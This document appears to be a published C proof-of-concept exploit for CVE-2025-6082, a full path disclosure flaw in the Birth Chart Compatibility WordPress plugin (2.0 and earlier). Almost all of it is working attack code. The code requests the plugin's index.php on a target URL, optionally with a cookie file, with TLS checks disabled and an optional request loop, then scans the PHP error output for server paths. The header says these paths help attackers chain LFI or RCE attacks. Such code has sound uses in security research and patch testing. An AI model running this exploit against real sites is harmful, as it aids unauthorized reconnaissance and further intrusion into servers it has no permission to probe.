Birth Chart Compatibility WordPress Plugin 2.0 – Full Path Disclosure


/*
 * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
 * Author       : Byte Reaper
 * Telegram     : @ByteReaper0
 * CVE          : CVE-2025-6082
 * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/
 * Description  : This proof-of-concept exercises the Full Path Disclosure bug in the
 *                "Birth Chart Compatibility" WordPress plugin (<= v2.0). It sends
 *                an HTTP GET request to the plugin's index.php endpoint, captures
 *                the resulting PHP warning or fatal error, and parses the server's
 *                filesystem path out of it (e.g. "/var/www/html/wp-content/plugins/..." or
 *                "C:\\xampp\\htdocs\\..."). Revealing this path aids attackers in
 *                chaining further LFI/RCE or reconnaissance attacks.
 */

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <curl/curl.h>
#include "argparse.h"
#define FULL 2300                 /* size of the URL buffer built in showPath() */
const char *url = NULL;           /* -u: base URL of the target; filled in by argparse in main() */
const char *cookies=NULL;         /* -c: cookie file handed to libcurl when selecetCookie is set */
int selecetCookie = 0;            /* set in main() when -c was given (spelling kept: referenced by showPath) */
int verbose = 0;                  /* -v: extra diagnostics and CURLOPT_VERBOSE in showPath() */

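/*
 * Terminate the process immediately with status 0, skipping atexit handlers
 * and stdio flushing.  On Linux/x86-64 this is the raw exit(2) syscall
 * (rax = 0x3C) the original used; on any other platform _Exit() gives the
 * same "no cleanup" semantics so the file still builds.
 *
 * Callers should fflush(stdout) first: buffered printf() output (e.g. when
 * stdout is a pipe) is otherwise lost.  Every caller in this file uses it on
 * an error path, yet the status is 0; kept for compatibility with scripts
 * that may already rely on it.
 */
_Noreturn void exitSyscall(void)
{
#if defined(__linux__) && defined(__x86_64__)
    /* syscall also clobbers rcx and r11; listing them (and "memory") keeps
     * the asm honest even though the process does not return. */
    __asm__ volatile
    (
        "xor %%rdi, %%rdi\n\t"
        "mov $0x3C, %%rax\n\t"
        "syscall\n\t"
        :
        :
        : "rax", "rdi", "rcx", "r11", "memory"
    );
#endif
    /* Reached on other platforms, or if the raw syscall ever returned. */
    _Exit(0);
}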
/* Substrings whose presence in the response body suggests a PHP error
 * message leaked the plugin's on-disk location; showPath() scans the body
 * for each entry.  Kept as a true array so sizeof-based counting works. */
const char *keyFound[] = { "Warning:", "Fatal error:", "/var/www/", "C:\\xampp\\" };
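/* Growable byte buffer filled by write_cb(); field order matters because
 * showPath() initializes it positionally as {NULL, 0}. */
struct Mem
{
    char *buffer;   /* heap block owned by the struct; NUL-terminated once written */
    size_t len;     /* bytes stored, excluding the terminator */
};

/*
 * libcurl CURLOPT_WRITEFUNCTION callback: append size*nmemb bytes from ptr
 * to the struct Mem pointed to by userdata, keeping the buffer NUL-terminated
 * so strstr() can run on it.
 *
 * Returns size*nmemb on success.  On allocation failure (or an absurd size)
 * it returns 0, which makes curl_easy_perform() stop the transfer with
 * CURLE_WRITE_ERROR so the caller can report and clean up; the previous
 * version killed the whole process from inside the callback instead.  The
 * existing buffer stays valid because realloc() does not free it on failure.
 */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct Mem *m = userdata;

    /* Guard the multiplication and the +1: libcurl passes size == 1 in
     * practice, but the callback signature does not promise it. */
    if (size != 0 && nmemb > (SIZE_MAX - 1 - m->len) / size)
    {
        printf("\e[1;31m[-] Response too large!\e[0m\n");
        return 0;
    }
    size_t total = size * nmemb;

    /* +1 keeps room for the terminator. */
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (tmp == NULL)
    {
        printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
        return 0;   /* abort the transfer instead of terminating the process */
    }
    m->buffer = tmp;
    if (total != 0)
    {
        memcpy(m->buffer + m->len, ptr, total);
    }
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}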
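/*
 * Issue one GET for <targetUrl>/wp-content/plugins/birth-chart-compatibility/index.php,
 * print the response and report which keyFound[] markers appear in the body.
 *
 * Reads the globals verbose, selecetCookie and cookies; collects the body via
 * write_cb() into a heap buffer that is freed before returning.  On a
 * transport-level failure the handle and buffer are released and the process
 * is terminated via exitSyscall().  No return value.
 *
 * Fixes over the previous version: the header list is freed (it leaked per
 * call), a NULL body is never passed to %s or strstr() (empty 2xx replies
 * crashed the keyword scan), and URL truncation is detected instead of
 * silently probing a mangled path.
 */
void showPath(const char *targetUrl)
{
    char full[FULL];
    struct Mem response = {NULL, 0};
    struct curl_slist *h = NULL;

    CURL *curl = curl_easy_init();
    if (curl == NULL)
    {
        exitSyscall();
    }
    if (verbose)
    {
        printf("==========================================\e[0m\n");
        printf("[+] Cleaning Response...\e[0m\n");
        /* buffer is still NULL here; passing NULL to %s is undefined behavior */
        printf("[+] Response Buffer : %s\e[0m\n", response.buffer ? response.buffer : "");
        printf("[+] Response Len : %zu\e[0m\n", response.len);
        printf("==========================================\e[0m\n");
    }
    fflush(stdout);

    /* Build the endpoint URL; a truncated URL would probe the wrong path. */
    int written = snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl);
    if (written < 0 || (size_t)written >= sizeof(full))
    {
        printf("\e[1;31m[-] Target Url too long !\e[0m\n");
        fflush(stdout);
        curl_easy_cleanup(curl);
        exitSyscall();
    }
    curl_easy_setopt(curl, CURLOPT_URL, full);
    if (selecetCookie)
    {
        /* The same file is read before the request and rewritten after it. */
        curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies);
        curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies);
    }
    curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, "");
    curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
    sleep(1);   /* pacing delay kept from the original; purpose not documented there */
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
    curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
    /* TLS certificate and hostname checks are disabled, so any host on the
     * path can answer for the target and the response is not authenticated.
     * Only defensible against lab hosts you control; use 1L / 2L otherwise. */
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
    if (verbose)
    {
        printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
        curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
    }

    /* NOTE(review): the explicit "Accept-Encoding: gzip" header replaces the
     * one CURLOPT_ACCEPT_ENCODING would send; presumably libcurl still
     * decodes the body because that option is set - confirm, otherwise the
     * keyword scan below would run over compressed bytes. */
    h = curl_slist_append(h, "Accept: text/html");
    h = curl_slist_append(h, "Accept-Encoding: gzip");
    h = curl_slist_append(h, "Accept-Language: en-US,en");
    h = curl_slist_append(h, "Connection: keep-alive");
    h = curl_slist_append(h, "Referer: http://example.com");
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);

    CURLcode curlCode = curl_easy_perform(curl);
    if (curlCode != CURLE_OK)
    {
        printf("\e[1;31m[-] The request was not sent !\e[0m\n");
        if (verbose)
        {
            printf("\e[1;31m[-] Exit Syscall ...\e[0m\n");
        }
        printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode));
        fflush(stdout);   /* exitSyscall() does not flush stdio */
        curl_easy_cleanup(curl);
        curl_slist_free_all(h);
        free(response.buffer);
        exitSyscall();
    }

    printf("---------------------------------------------------------------------------------------\n");
    printf("\e[1;36m[+] Request sent successfully\e[0m\n");
    printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl);
    printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full);

    long httpCode = 0;
    curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
    /* An empty body (e.g. a 204, or a zero-length 200) leaves buffer NULL. */
    const char *body = response.buffer ? response.buffer : "";
    if (httpCode >= 200 && httpCode < 300)
    {
        printf("[+] Http Code (200 < 300) !\e[0m\n");
        printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode);
        printf("\e[1;35m====================================[Response]====================================\e[0m\n");
        printf("%s\n", body);
        printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
        printf("\e[1;35m===================================================================================\e[0m\n\n");
        size_t numberKey = sizeof(keyFound) / sizeof(keyFound[0]);
        for (size_t k = 0; k < numberKey; k++)
        {
            const char *found = strstr(body, keyFound[k]);
            if (found)
            {
                printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]);
                /* %.100s bounds the excerpt so a large page is not echoed twice */
                printf("\e[1;34m[+] Context: %.100s\e[0m\n", found);
            }
        }
    }
    else
    {
        printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode);
        printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n");
        printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl);
        if (verbose)
        {
            printf("\e[1;35m====================================[Response]====================================\n");
            printf("%s\n", body);
            printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len);
            printf("\e[1;35m===================================================================================\n\n");
        }
    }

    /* Release the handle before the header list it still references. */
    curl_easy_cleanup(curl);
    curl_slist_free_all(h);
    free(response.buffer);
}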



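/*
 * Entry point: parse -u/--url, -c/--cookies, -v/--verbose and -f/--loop,
 * then run showPath() against the target.
 *
 * -f N now issues exactly N requests (no -f, or N <= 0, means one); the
 * previous code ran the loop and then one more unconditional request, so
 * "-f 10" sent 11.  A missing -u prints usage and terminates through
 * exitSyscall(), which does not flush stdio, hence the explicit fflush().
 * Returns 0.
 */
int main(int argc,
         const char **argv)
{
    printf
    (
        "\e[1;91m"
        "▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▄▖▄▖▄▖ \n"
        "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n"
        "▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  ▙▌█▌▙▌▙▖ \n"
        "\e[1;97m\t      Byte Reaper\e[0m\n"
    );
    printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n");

    int loop = 0;
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('u', "url", &url, "Target Url (Base Url)"),
        OPT_STRING('c', "cookies", &cookies, "cookies File"),
        OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"),
        OPT_INTEGER('f', "loop", &loop, "For loop (Request) (Ex : -f 10)"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, argv);

    if (!url)
    {
        printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n");
        printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n");
        fflush(stdout);
        exitSyscall();
    }
    /* Collapse whatever argparse stored for repeated -v to a plain 1. */
    if (verbose)
    {
        verbose = 1;
    }
    selecetCookie = (cookies != NULL);

    int runs = loop > 0 ? loop : 1;
    for (int o = 0; o < runs; o++)
    {
        showPath(url);
    }
    return 0;
}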
            


